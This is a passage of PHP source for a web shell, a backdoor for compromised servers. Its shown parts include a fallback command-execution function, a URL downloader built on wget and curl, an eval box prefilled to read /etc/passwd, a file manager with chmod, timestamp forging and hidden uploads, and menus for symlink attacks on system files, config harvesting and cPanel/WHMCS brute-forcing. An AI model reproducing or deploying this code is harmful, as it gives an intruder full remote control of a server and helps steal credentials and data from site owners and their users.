href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form9');\">mv</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">del</a> | <a href=\"?y=".$pwd.$folder."&x=upload\">upl</a></td></tr>";
716 $total_dir++;
717 }
718 }
719 foreach($fname as $file) {
720 $full=$pwd.$file;
721 if(!$win&&$posix) {
722 $name=@posix_getpwuid(@fileowner($folder));
723 $group=@posix_getgrgid(@filegroup($folder));
724 $owner=$name['name']." : ".$group['name'];
725 }
726 else {
727 $owner=$user;
728 }
729 $is_writable=is_writable($file)?"YES":"NO";
730 $buff.="<tr><td id='thcheck'><input type=\"checkbox\" name=\"file[]\" value=\"$file\" onchange=\"hilites(this);\" /></td><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\">";
731 if($file==basename($_SERVER['PHP_SELF'])) {
732 $buff.="<span class='gaya'>$file</span>";
733 }
734 else {
735 $buff.="$file";
736 }
737 $buff.="</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" /><input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" /></form><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form6\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldfile\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:100%;\" type=\"text\" name=\"newfile\" value=\"".$pwd."copy_of_".$file."\" /><input class=\"inputzbut\" type=\"submit\" name=\"copy\" value=\"copy\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form6');\" /></form><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form7\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldmove\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:100%;\" type=\"text\" name=\"newmove\" value=\"".$pwd.$file."\" /><input class=\"inputzbut\" type=\"submit\" name=\"move\" value=\"move\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form7');\" /></form></td><td style=\"text-align:right;\">".ukuran($file)."</td><td style=\"text-align:center;width:126px;\">".$owner."</td><td style=\"text-align:center;\"><a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".substr(sprintf('%o',fileperms($file)),-4)."</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o',fileperms($file)),-4)."\" /><input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></td><td><center>".get_perms($file)."</center></td><td align='center'>".$is_writable."</td><td style=\"text-align:center;\"><a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form4');\">".date("Y-m-d H:i:s",@filemtime($file))."</a><form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form4\" class=\"sembunyi\" style=\"margin:0;padding:0;\"><input type=\"hidden\" name=\"oldtime\" value=\"".$file."\" style=\"margin:0;padding:0;\" /><input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newtime\" value=\"".date("Y-m-d H:i:s",@filemtime($file))."\" /><input class=\"inputzbut\" type=\"submit\" name=\"touch\" value=\"touch\" /><input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form4');\" /></form></td><td style=\"width:152px;\"><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">ren</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form6');\">cp</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form7');\">mv</a> | <a href=\"?y=$pwd&delete=$full\">del</a> | <a href=\"?y=$pwd&dl=$full\">dl</a> / <a href=\"?y=$pwd&dlgzip=$full\">gz</a></td></tr>";
738 $total_file++;
739 }
740 $buff.="
741</tbody></table><table class='explore'><tfoot><tr><th id='thcheck'><input type=\"checkbox\" onclick=\"checkAlls(this)\" /></th><th colspan='6' style=\"padding:0px;\">
742<script language='javascript'>
743function checkAlls(bx){
744var cbs = document.getElementsByTagName('input');
745for(var i=0; i < cbs.length; i++){
746if(cbs[i].type == 'checkbox' && cbs[i].name != 'dis'){
747cbs[i].checked = bx.checked;
748var c = cbs[i].parentElement.parentElement;
749if(cbs[i].checked) c.className = 'cbox_selected';
750else c.className = '';
751}
752}
753total_selected();
754}
755function hilites(el){
756var c = el.parentElement.parentElement;
757if(el.checked) c.className = 'cbox_selected';
758else c.className = '';
759total_selected();
760}
761function total_selected(){
762var a = document.getElementsByName('file[]');
763var b = document.getElementById('total_selected');
764var c = 0;
765for(var i = 0;i<a.length;i++)
766if(a[i].checked) c++;
767if(c==0) b.innerHTML = 'Total : $total_file Files, $total_dir Directories';
768else b.innerHTML = 'Total : $total_file Files, $total_dir Directories ( Selected : '+c+' Items )';
769}
770</script>
771<input type='hidden' name='pwd' value='".$pwd."'/>
772<select name='selectedValue' class='inputz' style='width:100%;'>
773<option disabled selected id='total_selected'>Total : $total_file Files, $total_dir Directories</option>
774<option value='copy'>Copy</option>
775<option value='move'>Move</option>";
776 if(class_exists('ZipArchive'))
777 $buff.="<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
778 if(!empty($_COOKIE['z'])&&@count($_COOKIE['file']))
779 $buff.="<option value='paste' selected>Paste / Compress</option>";
780 $buff.="<option value='del'>Delete</option></select></th><th colspan='1' style='width:116px;padding:0px;'>";
781 if(!empty($_COOKIE['z'])&&@count($_COOKIE['file'])&&(($_COOKIE['z']=='zip'))) {
782 $buff.="<input type='text' class='inputz' style='width:100%;' name='nm' value='".date("Ymd_His").".".($_COOKIE['z']=='zip'?'zip':'tar.gz')."'/>";
783 }
784 else {
785 $buff.="<input type='text' class='inputz' style='width:100%;' value='----------------------------' disabled/>";
786 }
787 $buff.="</th><th colspan='1' style='padding:0px;width:181px;'><button type='submit' class='inputzbut'>Submit</button><button type='reset' class='inputzbut' name='reset' onclick=\"checkAlls(this)\">Reset</button><button type='button' class='inputzbut' name='reload' onclick='window.location.reload();'>Reload</button></th></tr></tfoot></form>
788</table>";
789 $buff.="
790<script language='javascript'>
791$(document).ready(function() {
792$('#search').freezeTable({
793'autoHeight' : false,
794'height' : 130,
795'scrollbarWidth': 15
796});
797});
798</script>
799";
800 return $buff;
801}
802function ukuran($file) {
803 if($size=@filesize($file)) {
804 if($size<=1024)
805 return "$size b ";
806 else {
807 if($size<=1024*1024) {
808 $size=@round($size/1024,2);;
809 return "$size kb ";
810 }
811 else {
812 $size=@round($size/1024/1024,2);
813 return "$size mb ";
814 }
815 }
816 }
817 else
818 return "<center>???</center>";
819}
820function exe($cmd) {
821 if(function_exists('system')) {
822 @ob_start();
823 @system($cmd);
824 $buff=@ob_get_contents();
825 @ob_end_clean();
826 return $buff;
827 }
828 elseif(function_exists('exec')) {
829 @exec($cmd,$results);
830 $buff="";
831 foreach($results as $result) {
832 $buff.=$result;
833 }
834 return $buff;
835 }
836 elseif(function_exists('passthru')) {
837 @ob_start();
838 @passthru($cmd);
839 $buff=@ob_get_contents();
840 @ob_end_clean();
841 return $buff;
842 }
843 elseif(function_exists('shell_exec')) {
844 $buff=@shell_exec($cmd);
845 return $buff;
846 }
847}
848function tulis($file,$text) {
849 $textz=gzinflate(base64_decode($text));
850 if($filez=@fopen($file,"w")) {
851 @fputs($filez,$textz);
852 @fclose($file);
853 }
854}
855function ambil($link,$file) {
856 if($fp=@fopen($link,"r")) {
857 while(!feof($fp)) {
858 $cont.=@fread($fp,1024);
859 }
860 @fclose($fp);
861 $fp2=@fopen($file,"w");
862 @fwrite($fp2,$cont);
863 @fclose($fp2);
864 }
865}
866function which($pr) {
867 $path=exe("which $pr");
868 if(!empty($path)) {
869 return trim($path);
870 }
871 else {
872 return trim($pr);
873 }
874}
875function download($cmd,$url) {
876 $namafile=basename($url);
877 switch($cmd) {
878 case 'wwget':
879 exe(which('wget')." ".$url." -O ".$namafile);
880 break;
881 case 'wlynx':
882 exe(which('lynx')." -source ".$url." > ".$namafile);
883 break;
884 case 'wfread':
885 ambil($wurl,$namafile);
886 break;
887 case 'wfetch':
888 exe(which('fetch')." -o ".$namafile." -p ".$url);
889 break;
890 case 'wlinks':
891 exe(which('links')." -source ".$url." > ".$namafile);
892 break;
893 case 'wget':
894 exe(which('GET')." ".$url." > ".$namafile);
895 break;
896 case 'wcurl':
897 exe(which('curl')." ".$url." -o ".$namafile);
898 break;
899 default:
900 break;
901 }
902 return $namafile;
903}
904function get_perms($file) {
905 if($mode=@fileperms($file)) {
906 $perms='';
907 $perms.=($mode&00400)?'r':'-';
908 $perms.=($mode&00200)?'w':'-';
909 $perms.=($mode&00100)?'x':'-';
910 $perms.=($mode&00040)?'r':'-';
911 $perms.=($mode&00020)?'w':'-';
912 $perms.=($mode&00010)?'x':'-';
913 $perms.=($mode&00004)?'r':'-';
914 $perms.=($mode&00002)?'w':'-';
915 $perms.=($mode&00001)?'x':'-';
916 return $perms;
917 }
918 else
919 return "??????????";
920}
921function clearspace($text) {
922 return str_replace(" ","_",$text);
923}
924?>
925<html><head><title>Shell By <? echo $xName;?></title>
926<script type="text/javascript">
927function tukar(lama,baru){
928document.getElementById(lama).style.display = 'none';
929document.getElementById(baru).style.display = 'block';
930}
931</script>
932<style type="text/css">
933body{
934background:#000000;
935}
936a{
937text-decoration:none;
938}
939a:hover{
940border-bottom:1px solid <?php echo $color[0];?>;
941color:<?php echo $color[0];?>;
942}
943*{
944font-size:11px;
945font-family:Tahoma,Verdana,Arial;
946color:#ffffff;
947}
948#menu{
949background:#111111;
950margin-top:3px;
951margin-bottom:9px;
952}
953#menu a{
954float:left;
955padding:5px 6px;
956letter-spacing:2px;
957background:#222222;
958margin:0.5px;
959}
960#menu a:hover{
961background:#191919;
962border-bottom:0px;
963}
964#menu ul{
965margin:0;
966padding:0;
967float:left;
968}
969#menu ul ul{
970position:absolute;
971top:24px;
972left:-990em;
973width:61px;
974}
975#menu ul ul a{
976display:block;
977}
978#menu li{
979position:relative;
980display:block;
981float:left;
982}
983#menu li:hover
984{
985cursor:pointer;
986}
987#menu li:hover>ul{
988left:1px;
989}
990#menu li:hover>ul a:hover{
991width:47px;
992background:#191919;
993}
994#menu li li{
995background:#222222;
996width:100%;
997margin-top:1px;
998}
999#menu li li a{
1000margin-top:1px;
1001}
1002#menu ul ul ul{
1003position:absolute;
1004top:-1px;
1005left:-990em;
1006width:125px;
1007}
1008#menu ul ul ul a{
1009display:block;
1010}
1011#menu li li:hover>ul{
1012left:61px;
1013border-left:1px solid #333333;
1014}
1015#menu li li:hover>ul a:hover{
1016width:110px;
1017background:#191919;
1018}
1019.tabnet{
1020margin:15px auto 0 auto;
1021border:1px solid #333333;
1022}
1023.main{
1024width:100%;
1025}
1026.gaya{
1027color:<?php echo $color[0];?>;
1028}
1029.guyu{
1030color:#888888;
1031}
1032.normal{
1033color:#ffffff;
1034}
1035.link{
1036color:<?php echo $color[0];?>;
1037text-decoration:none;
1038}
1039.link:hover{
1040color:<?php echo $color[0];?>;
1041border-bottom:1px solid <?php echo $color[0];?>;
1042}
1043.inputz{
1044background:#111111;
1045border:0;
1046padding:2px;
1047border-bottom:1px solid #222222;
1048border-top:1px solid #222222;
1049}
1050.inputzbut{
1051background:#111111;
1052color:#ffffff;
1053margin:0 4px;
1054border:1px solid #444444;
1055}
1056.inputz:hover, .inputzbut:hover{
1057border-bottom:1px solid <?php echo $color[0];?>;
1058border-top:1px solid <?php echo $color[0];?>;
1059}
1060.output{
1061margin:auto;
1062border:1px solid <?php echo $color[0];?>;
1063width:100%;
1064height:400px;
1065background:#000000;
1066padding:0 2px;
1067}
1068.outputz{
1069margin:auto;
1070width:500px;
1071border:1px solid <?php echo $color[0];?>;
1072background:#000000;
1073padding:0 2px;
1074}
1075.head_info{
1076padding: 0 4px;
1077background-color:#111111;
1078border-bottom:1px solid <?php echo $color[0];?>;
1079border-top:1px solid <?php echo $color[0];?>;
1080}
1081.s4mp4h{
1082font-size:65px;
1083padding:0;
1084color:#ffffff;
1085text-shadow: <?php echo $color[0];?> 0.0em 0.0em 0.2em;
1086}
1087.s4mp4h_tbl{
1088text-align:center;
1089margin:0 4px 0 0;
1090padding:0 4px 0 0;
1091border-right:1px solid #333333;
1092}
1093th{
1094background:#191919;
1095border-bottom:1px solid #333333;
1096font-weight:normal;
1097}
1098.explore, .cmdbox{
1099width:100%;
1100}
1101.explore a{
1102text-decoration:none;
1103}
1104.explore td{
1105border-bottom:1px solid #333333;
1106padding:0 5px;
1107line-height:21px;
1108}
1109.explore th{
1110padding:4px 8px;
1111font-weight:normal;
1112border-bottom:1px solid <?php echo $color[0];?>;
1113}
1114.explore th:hover{
1115border-bottom:1px solid <?php echo $color[0];?>;
1116}
1117.explore tr:hover{
1118background:<?php echo $color[1];?>;
1119}
1120.viewfile{
1121background:#EDECEB;
1122color:#000000;
1123margin:4px 2px;
1124padding:8px;
1125}
1126.sembunyi{
1127display:none;
1128padding:0;margin:0;
1129}
1130.sym th{
1131border-bottom:1px solid <?php echo $color[0];?>;
1132padding:3px;
1133}
1134.sym tr:hover{
1135background:<?php echo $color[1];?>;
1136}
1137.footer{
1138background:#111111;
1139border:0;
1140padding:4px;
1141border-bottom:1px solid <?php echo $color[0];?>;
1142border-top:1px solid <?php echo $color[0];?>;
1143}
1144.schemabox{
1145background-color:<?php echo $color[0];?>;
1146border-radius:2px;
1147}
1148.tab{
1149width:100%;
1150}
1151.tub{
1152width:100%;
1153}
1154.tub th{
1155border-bottom:1px solid <?php echo $color[0];?>;
1156padding:3px;
1157}
1158.tub tr:hover{
1159background:<?php echo $color[1];?>;
1160}
1161.tub td{
1162border-bottom:1px solid #333333;
1163padding-left:3px;
1164}
1165#maininfo{
1166padding:5px;
1167margin-top:10px;
1168margin-left:2px;
1169margin-right:2px;
1170background:#191919;
1171}
1172#maininfo a{
1173color:<?php echo $color[0];?>;
1174}
1175textarea{
1176background:#000000;
1177border:1px solid #444444;
1178}
1179textarea:hover{
1180border:1px solid <?php echo $color[0];?>;
1181}
1182.top{
1183background:#111111;
1184border:1px solid <?php echo $color[0];?>;
1185}
1186.tb{
1187background:#222222;
1188border:1px solid <?php echo $color[0];?>;
1189}
1190.tb:hover{
1191color:<?php echo $color[0];?>;
1192}
1193#thcheck{
1194width:25px;
1195padding:0px;
1196text-align:center;
1197}
1198.cbox_selected{
1199background-color:<?php echo $color[2];?>;
1200}
1201.phpinfo{
1202margin-top:3px;
1203}
1204.phpinfo table{
1205width:100%;
1206float:left;
1207}
1208.phpinfo td{
1209background:#111111;
1210color:#FFFFFF;
1211padding-left:5;
1212}
1213.phpinfo th{
1214background:#191919;
1215border-bottom:1px solid <?php echo $color[0];?>;
1216font-weight:normal;
1217}
1218.phpinfo h1, .phpinfo h2{
1219background:#222222;
1220padding:4px 6px;
1221margin:2px;
1222}
1223.phpinfo hr{
1224border:0;
1225color:<?php echo $color[0];?>;
1226background-color:<?php echo $color[0];?>;
1227height:1px;
1228}
1229.phpinfo br{
1230margin:-10px;
1231}
1232.hp{
1233background:#191919;
1234margin:-1px;
1235line-height:18px;
1236text-align:center;
1237}
1238.tooltip {
1239display:none;
1240position:absolute;
1241border:1px solid <?php echo $color[0];?>;
1242background-color:#111111;
1243padding:7px;
1244color:#FFFFFF;
1245}
1246.no:hover{
1247text-decoration:none;
1248border:none;
1249}
1250#spoiler{
1251margin-left:2px;
1252margin-right:2px;
1253margin-bottom:-11px;
1254background-color:#000000;
1255border:1px solid <?php echo $color[0];?>;
1256}
1257</style>
1258<script src="http://syntax-errorz.googlecode.com/svn/trunk/jquery.min.js" type="text/javascript"></script>
1259<script type="text/javascript">
1260$(document).ready(function(){
1261$("#go_search").keyup(function(){
1262if( $(this).val() != "")
1263{
1264$("#search tbody>tr").hide();
1265$("#search td:contains-ci('" + $(this).val() + "')").parent("tr").show();
1266}
1267else
1268{
1269$("#search tbody>tr").show();
1270}
1271});
1272});
1273$.extend($.expr[":"],
1274{
1275"contains-ci": function(elem, i, match, array)
1276{
1277return (elem.textContent || elem.innerText || $(elem).text() || "").toLowerCase().indexOf((match[3] || "").toLowerCase()) >= 0;
1278}
1279});
1280</script>
1281<script type="text/javascript">
1282$(document).ready(function() {
1283$('.tip').hover(function(){
1284var title = $(this).attr('title');
1285$(this).data('tipText', title).removeAttr('title');
1286$('<p class="tooltip"></p>')
1287.text(title)
1288.appendTo('body')
1289.fadeIn('slow');
1290}, function() {
1291$(this).attr('title', $(this).data('tipText'));
1292$('.tooltip').remove();
1293}).mousemove(function(e) {
1294var mousex = e.pageX + 15;
1295var mousey = e.pageY + 15;
1296$('.tooltip')
1297.css({ top: mousey, left: mousex })
1298});
1299});
1300</script>
1301</head>
1302<body onLoad="document.getElementById('cmd').focus();"><div class="main"><div class="head_info">
1303<span style="float:right;margin-bottom:-25px;-webkit-margin-before:-2px;-webkit-margin-end:-2px;">
1304<form method="get" style="margin-right:-4px;margin-top:-1px;">
1305<select class="top" name="x">
1306<option value="none" selected>Themes</option>
1307<option value="green">Green</option>
1308<option value="red">Red</option>
1309<option value="blue">Blue</option>
1310<option value="yellow">Yellow</option>
1311<option value="cyan">Cyan</option>
1312<option value="pink">Pink</option>
1313</select><button type="submit" class="tb" style="margin-left:-3px;">Go !</button>
1314</form>
1315</span><table ><tr><td><table class="s4mp4h_tbl"><tr><td><a href="<?php echo $_SERVER['PHP_SELF'];?>"><span class="s4mp4h tip" title="Shell By S4MP4H"><? echo $xName;?></span></a></td></tr><tr><td><b>[ Shell By <span class="gaya"><? echo $xName;?></span> ]</b></td></tr></table></td><td><?php echo $buff;?></td></tr></table>
1316<?php
1317echo "
1318<span class='sembunyi' id='chnameform' style='float:right;margin-bottom:5px;margin-right:0px;-webkit-margin-before:-2px;-webkit-margin-end:-2px;'>
1319<form method='get' style='margin:0;padding:0;float:right;margin-right:-4px;margin-top:-16px;'>
1320<select class='top' name='x' id='x' onchange='changeHandler(this);'>
1321<option value='none' selected>Change</option>
1322<option value='name'>Name</option>
1323<option value='token'>Token</option>
1324<option value='pass'>Pass</option>
1325</select><button type='submit' class='tb' style='margin-left:-3px;' disabled>Go !</button>
1326</form>
1327<form method='post' style='margin:0;padding:0;margin-right:-4px;margin-top:8px;-webkit-margin-after:-5px;'>
1328<input type='hidden' name='oldnamex' value='".basename($_SERVER['PHP_SELF'])."' />
1329 [Name] :
1330<input type='text' name='newnamex' class='top' onMouseOver=\"this.focus();\" style='width:80px;padding-left:1px;' value='".basename($_SERVER['PHP_SELF'])."' />
1331<input class='tb' type='submit' name='chname' value='Yes' />
1332<a href=\"javascript:tukar('chnameform','chname');\" class='no'><button class='tb'>No</button></a>
1333</form>
1334</span>
1335<span id='chname' style='float:right;margin-top:-16px;margin-right:-4px;-webkit-margin-before:-18px;-webkit-margin-end:-6px;'>
1336<form method='get' style='margin:0;padding:0;'>
1337<select class='top' name='x' id='x' onchange='changeHandler(this);'>
1338<option value='none' selected>Change</option>
1339<option value='name'>Name</option>
1340<option value='token'>Token</option>
1341<option value='pass'>Pass</option>
1342</select><button type='submit' class='tb' style='margin-left:-3px;' disabled>Go !</button>
1343</form>
1344</span>
1345";
1346?>
1347<script type='text/javascript'>
1348function changeHandler(target){
1349 if(target.value=='name'){
1350 window.location.href = "javascript:tukar('chname','chnameform')";
1351 }
1352 else{
1353 window.location.href = "?x="+target.value;
1354 }
1355}
1356</script>
1357<?php
1358if(isset($_POST['chname'])) {
1359 $oldx=$_POST['oldnamex'];
1360 $newx=$_POST['newnamex'];
1361 @rename($pwd.$oldx,$pwd.$newx);
1362 $file=$pwd.$newx;
1363 echo "
1364<script language='javascript'>
1365alert('Rename shell from ".$oldx." to ".$newx." successfull');
1366location.href = '".$newx."';
1367</script>
1368";
1369}
1370?>
1371</div>
1372<div id="menu" style="-webkit-margin-after:-12px;">
1373<ul class="menu">
1374<a href="?<?php echo "y=".$pwd;?>">Explore</a>
1375<a href="?<?php echo "y=".$pwd;?>&x=phpinfo">Info</a>
1376<a href="?<?php echo "y=".$pwd;?>&x=domain">Domain</a>
1377<a href="?<?php echo "y=".$pwd;?>&x=bypass">Bypass</a>
1378<li>
1379<a>Command</a>
1380<ul style="padding-right:12px;">
1381<li style="padding-right:12px;">
1382<a style="padding-right:18px;" href="?<?php echo "y=".$pwd;?>&x=shell">Exec</a>
1383</li>
1384<li style="padding-right:12px;">
1385<a style="padding-right:18px;" href="?<?php echo "y=".$pwd;?>&x=php">Eval</a>
1386</li>
1387</ul>
1388</li>
1389<li>
1390<a>Jumping</a>
1391<ul style="padding-right:4px;">
1392<li style="padding-right:4px;">
1393<a style="padding-right:10px;">Server</a>
1394<ul style="margin-left:4px;">
1395<li>
1396<a href="?<?php echo "y=".$pwd;?>&x=jumping">Default</a>
1397</li>
1398<li>
1399<a href="?<?php echo "y=".$pwd;?>&x=jumpings">Path</a>
1400</li>
1401</ul>
1402</li>
1403</ul>
1404</li>
1405<li>
1406<a>Symlink</a>
1407<ul>
1408<li>
1409<a>Server</a>
1410<ul>
1411<li>
1412<a href="?<?php echo "y=".$pwd;?>&x=symlink">/etc/named.conf</a>
1413</li>
1414<li>
1415<a href="?<?php echo "y=".$pwd;?>&x=symlinks">/etc/passwd</a>
1416</li>
1417<li>
1418<a href="?<?php echo "y=".$pwd;?>&x=symlinkss">Path</a>
1419</li>
1420</ul>
1421</li>
1422<li>
1423<a>Config</a>
1424<ul>
1425<li>
1426<a href="?<?php echo "y=".$pwd;?>&x=config">PHP</a>
1427</li>
1428<li>
1429<a href="?<?php echo "y=".$pwd;?>&x=configs">Perl</a>
1430</li>
1431<li>
1432<a href="?<?php echo "y=".$pwd;?>&x=configss">Manual</a>
1433</li>
1434<li>
1435<a href="?<?php echo "y=".$pwd;?>&x=configsss">Path</a>
1436</li>
1437</ul>
1438</li>
1439<li>
1440<a href="?<?php echo "y=".$pwd;?>&x=cms">Cms</a>
1441</li>
1442<li>
1443<a href="?<?php echo "y=".$pwd;?>&x=port">Port</a>
1444</li>
1445</ul>
1446</li>
1447<li>
1448<a>Database</a>
1449<ul style="padding-right:13px;">
1450<li style="padding-right:13px;">
1451<a style="padding-right:19px;width:47px;" href="?<?php echo "y=".$pwd;?>&x=db">Manage</a>
1452</li>
1453<li style="padding-right:13px;">
1454<a style="padding-right:19px;">Mysql</a>
1455<ul style="margin-left:13px;">
1456<li>
1457<a href="?<?php echo "y=".$pwd;?>&x=sql">Type GET</a>
1458</li>
1459<li>
1460<a href="?<?php echo "y=".$pwd;?>&x=mysql">Type POST</a>
1461</li>
1462</ul>
1463</li>
1464</ul>
1465</li>
1466<a href="?<?php echo "y=".$pwd;?>&x=netsploit">Netsploit</a>
1467<li>
1468<a>Options</a>
1469<ul style="padding-right:2px;">
1470<li style="padding-right:2px;">
1471<a style="padding-right:8px;">Brute</a>
1472<ul style="margin-left:2px;">
1473<li>
1474<a href="?<?php echo "y=".$pwd;?>&x=cpanel">Cpanel</a>
1475</li>
1476<li>
1477<a href="?<?php echo "y=".$pwd;?>&x=whmcs">Whmcs</a>
1478</li>
1479</ul>
1480</li>
1481<li style="padding-right:2px;">
1482<a style="padding-right:8px;">Tools</a>
1483<ul style="margin-left:2px;">
1484<li>
1485<a href="?<?php echo "y=".$pwd;?>&x=processes">Process</a>
1486</li>
1487<li>
1488<a href="?<?php echo "y=".$pwd;?>&x=scan">Scan</a>
1489</li>
1490<li>
1491<a href="?<?php echo "y=".$pwd;?>&x=mail">Mail</a>
1492</li>
1493</ul>
1494</li>
1495<li style="padding-right:2px;">
1496<a style="padding-right:8px;" href="?<?php echo "y=".$pwd;?>&x=ins">Install</a>
1497</li>
1498</ul>
1499</li>
1500<li>
1501<a>Uploads</a>
1502<ul style="padding-right:3px;">
1503<li style="padding-right:3px;">
1504<a style="padding-right:9px;" href="?<?php echo "y=".$pwd;?>&x=upload">Normal</a>
1505</li>
1506<li style="padding-right:3px;">
1507<a style="padding-right:9px;" href="#" onclick="if(document.getElementById('spoiler') .style.display=='none') {document.getElementById('spoiler') .style.display=''}else{document.getElementById('spoiler') .style.display='none'}">Hidden</a>
1508</li>
1509</ul>
1510</li>
1511<a href="?<?php echo "y=".$pwd;?>&x=logout">Logout</a>
1512</ul>
1513</div>
1514<div><br/></div>
1515<?php if(isset($_GET['x'])&&($_GET['x']=='php')) {?>
1516<form action="?y=<?php echo $pwd;?>&x=php" method="post" style="-webkit-margin-before:20px;"><br/><table class="cmdbox"><tr><td><textarea class="output" name="cmd" id="cmd">
1517<?php
1518if(isset($_POST['submitcmd'])) {
1519 echo eval(magicboom($_POST['cmd']));
1520 }
1521 else
1522 echo "echo file_get_contents('/etc/passwd');";
1523 ?>
1524</textarea><tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form></table></form>
1525<?php
1526}
1527elseif(isset($_GET['x'])&&($_GET['x']=='token')) {
1528 echo "<form action='?y=".$pwd."&x=token' method='post' style='-webkit-margin-before:35px;'><table class='tabnet'><tr><th colspan='2'>Change Token</th></tr><tr><td style='width:100px;'>Old token</td><td><input style='width:100%;' class='inputz' type='text' name='oldtoken' value='".$token."' disabled/></td></tr><tr><td style='width:100px;'>New token</td><td><input style='width:100%;' class='inputz' type='password' name='newtoken' value='' /></td></tr><tr><td style='width:100px;'>Confirm token</td><td><input style='width:100%;' class='inputz' type='password' name='newtokenx' value='' /></td></tr><tr><th colspan='2'><input type='submit' name='submitnewtoken' class='inputzbut' value='Go !' /><input type='hidden' name='x' value='token' /></th></tr></table></form>
1529<center>";
1530 if(isset($_POST['submitnewtoken'])) {
1531 $newtoken=isset($_POST['newtoken'])?trim($_POST['newtoken']):"";
1532 $newtokenx=isset($_POST['newtokenx'])?trim($_POST['newtokenx']):"";
1533 if(empty($newtoken)||empty($newtokenx)) {
1534 echo "<span class='guyu'>Give your new token to both fields</span>";
1535 }
1536 elseif($newtoken!=$newtokenx) {
1537 echo "<span class='guyu'>Token does not match</span>";
1538 }
1539 else {
1540 if(changetoken($newtoken)) {
1541 echo "<span class='gaya'>Token changed</span>";
1542 }
1543 else
1544 echo "<span class='guyu'>Unable to change token</span>";
1545 }
1546 }
1547 echo "</center>";
1548}
1549elseif(isset($_GET['x'])&&($_GET['x']=='pass')) {
1550 echo "<form action='?y=".$pwd."&x=pass' method='post' style='-webkit-margin-before:35px;'><table class='tabnet'><tr><th colspan='2'>Change Password</th></tr><tr><td style='width:100px;'>Old password</td><td><input style='width:100%;' class='inputz' type='text' name='oldpass' value='".$_SESSION[pass]."' disabled/></td></tr><tr><td style='width:100px;'>New password</td><td><input style='width:100%;' class='inputz' type='password' name='newpass' value='' /></td></tr><tr><td style='width:100px;'>Confirm password</td><td><input style='width:100%;' class='inputz' type='password' name='newpassx' value='' /></td></tr><tr><th colspan='2'><input type='submit' name='submitnewpass' class='inputzbut' value='Go !' /><input type='hidden' name='x' value='pass' /></th></tr></table></form>
1551<center>";
1552 if(isset($_POST['submitnewpass'])) {
1553 $newpass=isset($_POST['newpass'])?trim($_POST['newpass']):"";
1554 $newpassx=isset($_POST['newpassx'])?trim($_POST['newpassx']):"";
1555 if(empty($newpass)||empty($newpassx)) {
1556 echo "<span class='guyu'>Give your new password to both fields</span>";
1557 }
1558 elseif($newpass!=$newpassx) {
1559 echo "<span class='guyu'>Password does not match</span>";
1560 }
1561 else {
1562 if(changepass($newpass)) {
1563 $_SESSION[pass]=$newpass;
1564 echo "<span class='gaya'>Password changed</span>";
1565 }
1566 else
1567 echo "<span class='guyu'>Unable to change password</span>";
1568 }
1569 }
1570 echo "</center>";
1571}
1572elseif(isset($_GET['x'])&&($_GET['x']=='phpinfo')) {
1573 @ini_set('output_buffering',0);
1574 @ob_start();
1575 @eval("phpinfo();");
1576 $buff=@ob_get_contents();
1577 @ob_end_clean();
1578 $awal=strpos($buff,"<body>")+6;
1579 $akhir=strpos($buff,"</body>");
1580 echo "<br/><div class='phpinfo' style='-webkit-margin-before:20px;'>".substr($buff,$awal,$akhir-$awal)."</div><div style='margin-bottom:-15px;'> </div>";
1581}
1582elseif(isset($_GET['x'])&&($_GET['x']=='domain')) {
1583 ?>
1584<form action="?y=<?php echo $pwd;?>&x=domain" method="post">
1585<?php
1586echo "<br/><center style='-webkit-margin-before:20px;'><div class='sym'>";
1587 $file=@implode(@file("/etc/named.conf"));
1588 if(!$file) {
